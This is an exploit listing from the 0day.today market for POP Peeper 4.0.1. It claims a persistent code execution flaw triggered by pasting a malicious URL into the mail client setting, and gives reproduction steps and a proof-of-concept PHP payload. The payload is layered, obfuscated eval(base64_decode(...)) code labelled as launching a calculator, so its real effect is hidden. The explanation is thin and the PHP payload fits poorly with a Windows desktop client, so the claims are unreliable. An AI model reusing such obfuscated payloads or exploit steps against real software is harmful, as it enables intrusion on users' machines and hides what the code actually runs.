[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

POP Peeper 4.0.1 - Persistent Code Execution Vulnerability

Author
ZwX
Risk
[
Security Risk High
]
0day-ID
0day-ID-24616
Category
remote exploits
Date add
27-11-2015
Platform
windows
# Title : POP Peeper 4.0.1 - Persistent Code Execution Vulnerability
# Author : ZwX
# Vendor : http://www.esumsoft.com/
# Download : http://data.esumsoft.com/download/POPPeeperPro.zip
# Tested On : Windows 7

# Description Vulnerability :
=============================

A code execution vulnerability is located in the software POP Peeper. 
An attacker can download a remote program from a malicious URL is Register by default.
I created a video that demonstrates how to download a software on a victim website create by the attacker.

Proof Video :
=============

http://zwx.fr/videos/POPPeeper.html

# Manual steps to reproduce the vulnerability :
===============================================

# 1. Launch POP Peeper.exe                
# 2. Click Tools -> Options -> General                 
# 3. Paste malicious url in input "Email Client"
# 4. Click ok and Clik Compose
# 5. PHP code executed successfully

# PoC Exploit :
===============

<?php

#######################################
#    Code Execution Calculator        #
#   By ZwX -  Vulnerability Lab.com   #
#######################################

eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdaWFpoYkNoaVlYTmxOalJmWkdWamIy
                   UmxLQ2RhV0doc1dYbG5ibEY2Y0dOV01HeFBVa1U1V0ZVeGVIcGxXRTR3V
                   2xjd2VrMXNlR3BaVjNocVRHMVdORnBUWTNCUGR6MDlKeWtwT3c9PScpKTs='));

?>

#  0day.today [2024-11-16]  #